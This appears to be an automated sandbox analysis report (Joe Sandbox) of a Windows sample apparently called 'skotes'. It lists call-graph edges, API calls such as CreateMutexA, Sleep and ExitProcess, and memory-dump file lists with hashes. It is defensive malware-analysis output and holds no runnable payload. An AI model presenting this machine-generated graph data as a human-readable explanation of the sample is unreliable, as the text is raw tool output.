RtlAllocateHeap 11586->11590 11588 9cce9d 11587->11588 11589 9cca70 4 API calls 11588->11589 11590->11577 11592 9c9080 11591->11592 11593 9d7a00 RtlAllocateHeap 11592->11593 11594 9c908f 11593->11594 11595 9c5c10 4 API calls 11594->11595 11596 9c909a 11595->11596 11597 9d80c0 RtlAllocateHeap 11596->11597 11598 9c90ec 11597->11598 11599 9d8220 RtlAllocateHeap 11598->11599 11601 9c90fe 11599->11601 11600 9c917e 11600->11582 11601->11600 11602 9f6c6a RtlAllocateHeap 11601->11602 11603 9c91aa 11602->11603 11604 9c4276 11605 9c2410 5 API calls 11604->11605 11606 9c427f 11605->11606 11607 9c3ce0 RtlAllocateHeap 11606->11607 11608 9c428f 11607->11608 11658 9c3f9f 11659 9c3fad 11658->11659 11663 9c3fc5 11658->11663 11660 9c2410 5 API calls 11659->11660 11661 9c3fb6 11660->11661 11662 9c3ce0 RtlAllocateHeap 11661->11662 11662->11663 11667 9c2b90 11668 9c2bce 11667->11668 11671 9db7fb 11668->11671 11670 9c2bdb 11672 9db807 11671->11672 11674 9db817 11671->11674 11672->11674 11675 9dca78 11672->11675 11674->11670 11676 9dca8d TpReleaseWork 11675->11676 11676->11674 11710 9c8980 11711 9c8aea 11710->11711 11715 9c89d8 11710->11715 11712 9d7a00 RtlAllocateHeap 11712->11715 11713 9c5c10 4 API calls 11713->11715 11714 9c8b20 11717 9d8200 RtlAllocateHeap 11714->11717 11715->11711 11715->11712 11715->11713 11715->11714 11716 9d80c0 RtlAllocateHeap 11715->11716 11718 9c8b25 11715->11718 11716->11715 11717->11718 11719 9f6c6a RtlAllocateHeap 11718->11719 11720 9c8b2a 11719->11720 11731 9f8bbe 11734 9f8868 11731->11734 11735 9f868d RtlAllocateHeap 11734->11735 11738 9f887a 11735->11738 11736 9f88b3 11739 9f690a 4 API calls 11736->11739 11737 9f888f 11740 9f75f6 RtlAllocateHeap 11737->11740 11738->11736 11738->11737 11751 9f889f 11738->11751 11744 9f88bf 11739->11744 11741 9f8894 11740->11741 11742 9f6c5a RtlAllocateHeap 11741->11742 11742->11751 11743 9f6d52 4 API calls 11743->11744 11744->11743 11745 9f88ee 11744->11745 11748 9f8958 11745->11748 11752 9f8a8d 11745->11752 11746 9f8a8d RtlAllocateHeap 11749 9f8a20 11746->11749 11748->11746 11750 9f75f6 RtlAllocateHeap 11749->11750 11749->11751 11750->11751 11753 9f8a9e 11752->11753 11754 9f8ab2 11752->11754 11753->11754 11755 9f75f6 RtlAllocateHeap 11753->11755 11754->11748 11756 9f8aa7 11755->11756 11757 9f6c5a RtlAllocateHeap 11756->11757 11757->11754 11758 9f67b7 11759 9f67c3 11758->11759 11760 9f67cd 11759->11760 11761 9f67e2 11759->11761 11762 9f75f6 RtlAllocateHeap 11760->11762 11766 9f67dd 11761->11766 11767 9f6740 11761->11767 11763 9f67d2 11762->11763 11764 9f6c5a RtlAllocateHeap 11763->11764 11764->11766 11768 9f674d 11767->11768 11769 9f6762 11767->11769 11770 9f75f6 RtlAllocateHeap 11768->11770 11775 9f675d 11769->11775 11783 9fa038 11769->11783 11772 9f6752 11770->11772 11774 9f6c5a RtlAllocateHeap 11772->11774 11774->11775 11775->11766 11779 9f6785 11800 9faebb 11779->11800 11782 9fadf5 RtlAllocateHeap 11782->11775 11784 9fa050 11783->11784 11788 9f6777 11783->11788 11785 9fafe4 RtlAllocateHeap 11784->11785 11784->11788 11786 9fa06e 11785->11786 11815 a00439 11786->11815 11789 9fb00b 11788->11789 11790 9f677f 11789->11790 11791 9fb022 11789->11791 11793 9fafe4 11790->11793 11791->11790 11792 9fadf5 RtlAllocateHeap 11791->11792 11792->11790 11794 9fb005 11793->11794 11795 9faff0 11793->11795 11794->11779 11796 9f75f6 RtlAllocateHeap 11795->11796 11797 9faff5 11796->11797 11798 9f6c5a RtlAllocateHeap 11797->11798 11799 9fb000 11798->11799 11799->11779 11801 9faecc 11800->11801 11804 9faee1 11800->11804 11802 9f75e3 RtlAllocateHeap 11801->11802 11806 9faed1 11802->11806 11803 9faf2a 11805 9f75e3 RtlAllocateHeap 11803->11805 11804->11803 11809 9faf08 11804->11809 11807 9faf2f 11805->11807 11808 9f75f6 RtlAllocateHeap 11806->11808 11810 9f75f6 RtlAllocateHeap 11807->11810 11812 9f678b 11808->11812 11833 9fae2f 11809->11833 11813 9faf37 11810->11813 11812->11775 11812->11782 11814 9f6c5a RtlAllocateHeap 11813->11814 11814->11812 11816 a00445 11815->11816 11817 a00465 11816->11817 11818 a0044d 11816->11818 11820 a00500 11817->11820 11829 a00497 11817->11829 11819 9f75e3 RtlAllocateHeap 11818->11819 11821 a00452 11819->11821 11822 9f75e3 RtlAllocateHeap 11820->11822 11823 9f75f6 RtlAllocateHeap 11821->11823 11824 a00505 11822->11824 11825 a0045a 11823->11825 11826 9f75f6 RtlAllocateHeap 11824->11826 11825->11788 11827 a0050d 11826->11827 11828 9f6c5a RtlAllocateHeap 11827->11828 11828->11825 11829->11825 11830 9f75f6 RtlAllocateHeap 11829->11830 11831 a004be 11830->11831 11832 9f75e3 RtlAllocateHeap 11831->11832 11832->11825 11834 9fae3b 11833->11834 11835 9fae7b 11834->11835 11836 9fae70 11834->11836 11838 9f75f6 RtlAllocateHeap 11835->11838 11840 9faf48 11836->11840 11839 9fae76 11838->11839 11839->11812 11851 9fc0de 11840->11851 11842 9faf58 11843 9faf90 11842->11843 11844 9fc0de RtlAllocateHeap 11842->11844 11846 9faf5e 11842->11846 11845 9fc0de RtlAllocateHeap 11843->11845 11843->11846 11848 9faf87 11844->11848 11845->11846 11847 9fafd8 11846->11847 11849 9f75c0 RtlAllocateHeap 11846->11849 11847->11839 11850 9fc0de RtlAllocateHeap 11848->11850 11849->11847 11850->11843 11852 9fc0eb 11851->11852 11853 9fc100 11851->11853 11854 9f75e3 RtlAllocateHeap 11852->11854 11856 9f75e3 RtlAllocateHeap 11853->11856 11858 9fc125 11853->11858 11855 9fc0f0 11854->11855 11857 9f75f6 RtlAllocateHeap 11855->11857 11859 9fc130 11856->11859 11860 9fc0f8 11857->11860 11858->11842 11861 9f75f6 RtlAllocateHeap 11859->11861 11860->11842 11862 9fc138 11861->11862 11863 9f6c5a RtlAllocateHeap 11862->11863 11863->11860 11864 9c6db5 11865 9c6dc2 11864->11865 11866 9c6dca 11865->11866 11867 9c6df5 11865->11867 11868 9d80c0 RtlAllocateHeap 11866->11868 11869 9d80c0 RtlAllocateHeap 11867->11869 11870 9c6deb 11868->11870 11869->11870 11871 9c6ec1 11870->11871 11872 9f6c6a RtlAllocateHeap 11870->11872 11873 9c6ee3 11872->11873 11878 9cb7b1 11880 9cb7be 11878->11880 11879 9d7a00 RtlAllocateHeap 11881 9cb7f3 11879->11881 11880->11879 11882 9d7a00 RtlAllocateHeap 11881->11882 11883 9cb80b 11882->11883 11884 9d7a00 RtlAllocateHeap 11883->11884 11885 9cb823 11884->11885 11886 9d7a00 RtlAllocateHeap 11885->11886 11887 9cb835 11886->11887 11897 9c9ba5 11898 9c9ba7 11897->11898 11899 9d7a00 RtlAllocateHeap 11898->11899 11900 9c9ca9 11899->11900 11901 9c5c10 4 API calls 11900->11901 11902 9c9cb1 11901->11902 11903 9c8b30 4 API calls 11902->11903 11904 9c9cc2 11903->11904 11905 9d8220 RtlAllocateHeap 11904->11905 11906 9c9cd1 11905->11906 11947 9c87d0 11948 9c88d3 11947->11948 11956 9c8819 11947->11956 11949 9d80c0 RtlAllocateHeap 11948->11949 11955 9c8923 11949->11955 11950 9c896c 11952 9d8200 RtlAllocateHeap 11950->11952 11951 9d80c0 RtlAllocateHeap 11951->11956 11954 9c8971 11952->11954 11953 9c8949 11955->11953 11957 9f6c6a RtlAllocateHeap 11955->11957 11956->11948 11956->11950 11956->11951 11956->11955 11957->11950 11993 9c21c0 11994 9c21cb 11993->11994 11995 9c21d0 11993->11995 11996 9c21ec 11995->11996 11997 9c21d4 11995->11997 12000 9c21fc 11996->12000 12002 9c223a 11996->12002 12003 9c2221 11996->12003 11998 9f75f6 RtlAllocateHeap 11997->11998 11999 9c21d9 11998->11999 12001 9f6c5a RtlAllocateHeap 11999->12001 12004 9c21e4 12001->12004 12006 9c2231 12002->12006 12008 9f75f6 RtlAllocateHeap 12002->12008 12005 9f75f6 RtlAllocateHeap 12003->12005 12007 9c2226 12005->12007 12009 9f6c5a RtlAllocateHeap 12007->12009 12010 9c2247 12008->12010 12009->12006 12011 9f6c5a RtlAllocateHeap 12010->12011 12012 9c2252 12011->12012 12021 9d79c0 12022 9d79e0 12021->12022 12022->12022 12023 9d80c0 RtlAllocateHeap 12022->12023 12024 9d79f2 12023->12024 12025 9d83c0 12026 9d7760 RtlAllocateHeap 12025->12026 12027 9d8439 12026->12027 12028 9d8f40 RtlAllocateHeap 12027->12028 12029 9d8454 12027->12029 12028->12029 12030 9d8f40 RtlAllocateHeap 12029->12030 12032 9d84a8 12029->12032 12031 9d84ee 12030->12031 12037 9c55f0 12038 9c5610 12037->12038 12039 9c22c0 4 API calls 12038->12039 12040 9c5710 12038->12040 12039->12038 12041 9c43f0 12042 9dbedf InitOnceExecuteOnce 12041->12042 12043 9c440a 12042->12043 12044 9c4411 12043->12044 12045 9f6cbb 4 API calls 12043->12045 12046 9c4424 12045->12046 12087 9c3fe0 12088 9c4022 12087->12088 12089 9c408c 12088->12089 12090 9c40d2 12088->12090 12093 9c4035 12088->12093 12094 9c35e0 12089->12094 12105 9c3ee0 12090->12105 12095 9dd3e2 RtlAllocateHeap 12094->12095 12096 9c3616 12095->12096 12097 9c364e 12096->12097 12098 9c3691 12096->12098 12099 9c3663 12097->12099 12101 9dc17c RtlAllocateHeap 12097->12101 12111 9c2ce0 12098->12111 12099->12093 12103 9c3720 12101->12103 12102 9c369e 12102->12099 12120 9c2c00 12102->12120 12103->12093 12106 9c3f1e 12105->12106 12107 9c3f48 12105->12107 12106->12093 12108 9c3f58 12107->12108 12109 9c2c00 4 API calls 12107->12109 12108->12093 12110 9c3f7f 12109->12110 12110->12093 12112 9c2d1d 12111->12112 12113 9dbedf InitOnceExecuteOnce 12112->12113 12114 9c2d46 12113->12114 12115 9c2d51 12114->12115 12116 9c2d88 12114->12116 12130 9dbef7 12114->12130 12115->12102 12118 9c2440 4 API calls 12116->12118 12119 9c2d9b 12118->12119 12119->12102 12121 9dd3e2 RtlAllocateHeap 12120->12121 12122 9c2c0e 12121->12122 12155 9db847 12122->12155 12124 9c2c42 12125 9c2c49 12124->12125 12161 9c2c80 12124->12161 12125->12099 12127 9c2c58 12164 9c2560 12127->12164 12129 9c2c65 12131 9dbf03 12130->12131 12139 9c2900 12131->12139 12133 9dbf23 12134 9dbf6a 12133->12134 12135 9dbf73 12133->12135 12149 9dbe7f 12134->12149 12137 9c2ae0 5 API calls 12135->12137 12138 9dbf6f 12137->12138 12138->12116 12140 9d80c0 RtlAllocateHeap 12139->12140 12141 9c294f 12140->12141 12142 9c26b0 RtlAllocateHeap 12141->12142 12143 9c2967 12142->12143 12144 9c298d 12143->12144 12145 9f6c6a RtlAllocateHeap 12143->12145 12144->12133 12146 9c29b6 12145->12146 12147 9f38af RtlAllocateHeap 12146->12147 12148 9c29e4 12147->12148 12148->12133 12150 9dcc31 InitOnceExecuteOnce 12149->12150 12151 9dbe97 12150->12151 12152 9dbe9e 12151->12152 12153 9f6cbb 4 API calls 12151->12153 12152->12138 12154 9dbea7 12153->12154 12154->12138 12156 9db854 12155->12156 12160 9db873 12155->12160 12167 9dcb77 12156->12167 12158 9db864 12158->12160 12169 9db81e 12158->12169 12160->12124 12162 9db7fb TpReleaseWork 12161->12162 12163 9c2cb2 12162->12163 12163->12127 12165 9f38af RtlAllocateHeap 12164->12165 12166 9c2597 12165->12166 12166->12129 12168 9dcb92 CreateThreadpoolWork 12167->12168 12168->12158 12170 9db827 12169->12170 12173 9dcdcc 12170->12173 12172 9db841 12172->12160 12174 9dcde1 TpPostWork 12173->12174 12174->12172 12175 9d85e0 12176 9d85f6 12175->12176 12176->12176 12177 9d8f40 RtlAllocateHeap 12176->12177 12178 9d860b 12176->12178 12177->12178 12179 9d8de0 12180 9d8f2f 12179->12180 12181 9d8e05 12179->12181 12182 9d9270 RtlAllocateHeap 12180->12182 12185 9d8e4c 12181->12185 12186 9d8e76 12181->12186 12183 9d8f34 12182->12183 12184 9c2480 RtlAllocateHeap 12183->12184 12192 9d8e5d 12184->12192 12185->12183 12187 9d8e57 12185->12187 12188 9dd3e2 RtlAllocateHeap 12186->12188 12186->12192 12190 9dd3e2 RtlAllocateHeap 12187->12190 12188->12192 12189 9f6c6a RtlAllocateHeap 12191 9d8f3e 12189->12191 12190->12192 12192->12189 12193 9d8eed 12192->12193 12194 9c211c 12195 9c2126 12194->12195 12196 9dd64e RtlAllocateHeap 12195->12196 12197 9c2132 12196->12197 12198 9dd111 12200 9dd122 12198->12200 12199 9dd12a 12200->12199 12202 9dd199 12200->12202 12203 9dd1a7 SleepConditionVariableCS 12202->12203 12204 9dd1c0 12202->12204 12203->12204 12204->12200 12209 9c2b10 12210 9c2b1c 12209->12210 12211 9c2b1a 12209->12211 12212 9dc26a 5 API calls 12210->12212 12213 9c2b22 12212->12213 12214 9d8510 12215 9d855f 12214->12215 12218 9d856c 12214->12218 12220 9d9d00 12215->12220 12217 9d85c4 12218->12217 12241 9da060 12218->12241 12221 9d9e31 12220->12221 12225 9d9d25 12220->12225 12222 9d9270 RtlAllocateHeap 12221->12222 12234 9d9d8b 12222->12234 12223 9f6c6a RtlAllocateHeap 12232 9d9e3b 12223->12232 12224 9d9e2c 12228 9c2480 RtlAllocateHeap 12224->12228 12225->12224 12226 9d9d7a 12225->12226 12227 9d9da1 12225->12227 12226->12224 12229 9d9d85 12226->12229 12231 9dd3e2 RtlAllocateHeap 12227->12231 12227->12234 12228->12221 12230 9dd3e2 RtlAllocateHeap 12229->12230 12230->12234 12231->12234 12233 9d9e6a 12232->12233 12235 9f6c6a RtlAllocateHeap 12232->12235 12233->12218 12234->12223 12236 9d9dfc 12234->12236 12237 9d9e8e 12235->12237 12236->12218 12238 9d9ec0 12237->12238 12239 9f6c6a RtlAllocateHeap 12237->12239 12238->12218 12240 9d9ee6 12239->12240 12242 9da1b1 12241->12242 12246 9da083 12241->12246 12243 9d9270 RtlAllocateHeap 12242->12243 12254 9da0e4 12243->12254 12244 9f6c6a RtlAllocateHeap 12253 9da1bb 12244->12253 12245 9da1ac 12249 9c2480 RtlAllocateHeap 12245->12249 12246->12245 12247 9da0fd 12246->12247 12248 9da0d3 12246->12248 12252 9dd3e2 RtlAllocateHeap 12247->12252 12247->12254 12248->12245 12250 9da0de 12248->12250 12249->12242 12251 9dd3e2 RtlAllocateHeap 12250->12251 12251->12254 12252->12254 12253->12218 12254->12244 12255 9da16c 12254->12255 12255->12218 12274 9c4300 12275 9c432e 12274->12275 12278 9c4359 12274->12278 12276 9f6c6a RtlAllocateHeap 12275->12276 12275->12278 12277 9c43eb 12276->12277 12309 9c6535 12311 9c6549 12309->12311 12310 9f6c6a RtlAllocateHeap 12313 9c65dc 12310->12313 12311->12310 12312 9c65b1 12311->12312 12314 9d7a00 RtlAllocateHeap 12313->12314 12315 9c66a6 12314->12315 12316 9c5c10 4 API calls 12315->12316 12317 9c66ac 12316->12317 12318 9c5c10 4 API calls 12317->12318 12319 9c66b1 12318->12319 12320 9c22c0 4 API calls 12319->12320 12321 9c66c9 12320->12321 12322 9d7a00 RtlAllocateHeap 12321->12322 12323 9c6732 12322->12323 12324 9c5c10 4 API calls 12323->12324 12325 9c673d 12324->12325 12326 9c22c0 4 API calls 12325->12326 12335 9c6757 12326->12335 12327 9c6852 12328 9d80c0 RtlAllocateHeap 12327->12328 12330 9c689c 12328->12330 12329 9d7a00 RtlAllocateHeap 12329->12335 12331 9d80c0 RtlAllocateHeap 12330->12331 12334 9c68e3 12331->12334 12332 9c5c10 4 API calls 12332->12335 12333 9c22c0 4 API calls 12333->12335 12335->12327 12335->12329 12335->12332 12335->12333 12339 9f6729 12342 9f6672 12339->12342 12341 9f673b 12344 9f667e 12342->12344 12343 9f6685 12345 9f75f6 RtlAllocateHeap 12343->12345 12344->12343 12347 9f66a5 12344->12347 12346 9f668a 12345->12346 12348 9f6c5a RtlAllocateHeap 12346->12348 12349 9f66aa 12347->12349 12350 9f66b7 12347->12350 12355 9f6695 12348->12355 12351 9f75f6 RtlAllocateHeap 12349->12351 12356 9fa8c3 12350->12356 12351->12355 12353 9f66c0 12354 9f75f6 RtlAllocateHeap 12353->12354 12353->12355 12354->12355 12355->12341 12357 9fa8cf 12356->12357 12360 9fa967 12357->12360 12359 9fa8ea 12359->12353 12365 9fa98a 12360->12365 12361 9fd82f RtlAllocateHeap 12362 9fa9eb 12361->12362 12363 9fadf5 RtlAllocateHeap 12362->12363 12364 9fa9d0 12363->12364 12364->12359 12365->12361 12365->12364 12371 9c4120 12372 9c416a 12371->12372 12373 9c41a6 12372->12373 12376 9c41f6 12372->12376 12374 9c3ee0 4 API calls 12373->12374 12377 9c41b2 12374->12377 12378 9db6be 12376->12378 12379 9db6ca 12378->12379 12382 9d75a0 12379->12382 12383 9d75ab 12382->12383 12384 9dc0e9 RtlAllocateHeap 12383->12384 12385 9dc1aa 12384->12385 12421 9d8320 12422 9d8339 12421->12422 12423 9d834d 12422->12423 12424 9d8f40 RtlAllocateHeap 12422->12424 12424->12423 12425 9c215a 12430 9dc6fc 12425->12430 12428 9dd64e RtlAllocateHeap 12429 9c216e 12428->12429 12431 9dc70c 12430->12431 12432 9c2164 12430->12432 12431->12432 12434 9dcfbe 12431->12434 12432->12428 12435 9dccd5 InitializeCriticalSectionEx 12434->12435 12436 9dcfd0 12435->12436 12436->12431 12437 9ca54d 12439 9ca555 12437->12439 12438 9ca944 12441 9f6c6a RtlAllocateHeap 12438->12441 12439->12438 12440 9ca628 12439->12440 12443 9d80c0 RtlAllocateHeap 12440->12443 12442 9ca949 12441->12442 12444 9f6c6a RtlAllocateHeap 12442->12444 12445 9ca903 12443->12445 12446 9ca94e 12444->12446 12447 9f6c6a RtlAllocateHeap 12446->12447 12448 9ca953 Sleep CreateMutexA 12447->12448 12449 9ca98e 12448->12449 12462 9c9f44 12463 9c9f4c 12462->12463 12464 9ca01f 12463->12464 12465 9ca92b 12463->12465 12469 9d80c0 RtlAllocateHeap 12464->12469 12466 9ca953 Sleep CreateMutexA 12465->12466 12467 9f6c6a RtlAllocateHeap 12465->12467 12468 9ca98e 12466->12468 12467->12466 12470 9ca903 12469->12470 12511 9c5f76 12513 9c5f81 12511->12513 12512 9c5ffe 12513->12512 12514 9f6c6a RtlAllocateHeap 12513->12514 12515 9c601b 12514->12515 12516 9d80c0 RtlAllocateHeap 12515->12516 12517 9c6089 12516->12517 12518 9d80c0 RtlAllocateHeap 12517->12518 12519 9c60bd 12518->12519 12520 9d80c0 RtlAllocateHeap 12519->12520 12521 9c60ee 12520->12521 12522 9d80c0 RtlAllocateHeap 12521->12522 12523 9c611f 12522->12523 12524 9d80c0 RtlAllocateHeap 12523->12524 12526 9c6150 12524->12526 12525 9c65b1 12526->12525 12527 9f6c6a RtlAllocateHeap 12526->12527 12528 9c65dc 12527->12528 12529 9d7a00 RtlAllocateHeap 12528->12529 12530 9c66a6 12529->12530 12531 9c5c10 4 API calls 12530->12531 12532 9c66ac 12531->12532 12533 9c5c10 4 API calls 12532->12533 12534 9c66b1 12533->12534 12535 9c22c0 4 API calls 12534->12535 12536 9c66c9 12535->12536 12537 9d7a00 RtlAllocateHeap 12536->12537 12538 9c6732 12537->12538 12539 9c5c10 4 API calls 12538->12539 12540 9c673d 12539->12540 12541 9c22c0 4 API calls 12540->12541 12549 9c6757 12541->12549 12542 9c6852 12543 9d80c0 RtlAllocateHeap 12542->12543 12545 9c689c 12543->12545 12544 9d7a00 RtlAllocateHeap 12544->12549 12546 9d80c0 RtlAllocateHeap 12545->12546 12548 9c68e3 12546->12548 12547 9c5c10 4 API calls 12547->12549 12549->12542 12549->12544 12549->12547 12550 9c22c0 4 API calls 12549->12550 12550->12549 12551 9c3970 12552 9dc68b 2 API calls 12551->12552 12553 9c39a7 12552->12553 12554 9dc68b 2 API calls 12553->12554 12555 9c39e6 12554->12555 12556 9c2170 12557 9dc6fc InitializeCriticalSectionEx 12556->12557 12558 9c217a 12557->12558 12559 9dd64e RtlAllocateHeap 12558->12559 12560 9c2184 12559->12560 12561 9c3770 12562 9c379b 12561->12562 12563 9c37cd 12562->12563 12564 9f6c6a RtlAllocateHeap 12562->12564 12565 9c380f 12564->12565

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 367 9f652b-9f6538 call 9fa302 370 9f655a-9f656c call 9f656d ExitProcess 367->370 371 9f653a-9f6548 GetPEB 367->371 371->370 372 9f654a-9f6559 371->372 372->370
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,009F652A,?,?,?,?,?,009F7661), ref: 009F6566
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                        • Opcode ID: 5e74003d0042d216313fa177963bfa2570589a047f46320dbd5d40fb4ea53d5f
                                                                                                                                                                                                        • Instruction ID: 0eb605e943988dd32d89c2370916b3faa493c6b4ec87fbf8f078bc8f7c6e1e43
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e74003d0042d216313fa177963bfa2570589a047f46320dbd5d40fb4ea53d5f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0E0EC7014124CAACE257B68CC19A693B6EFF91759F245814FA085A236CB25DD82CB91

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 009CA963
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981
                                                                                                                                                                                                        Memory Dump Source
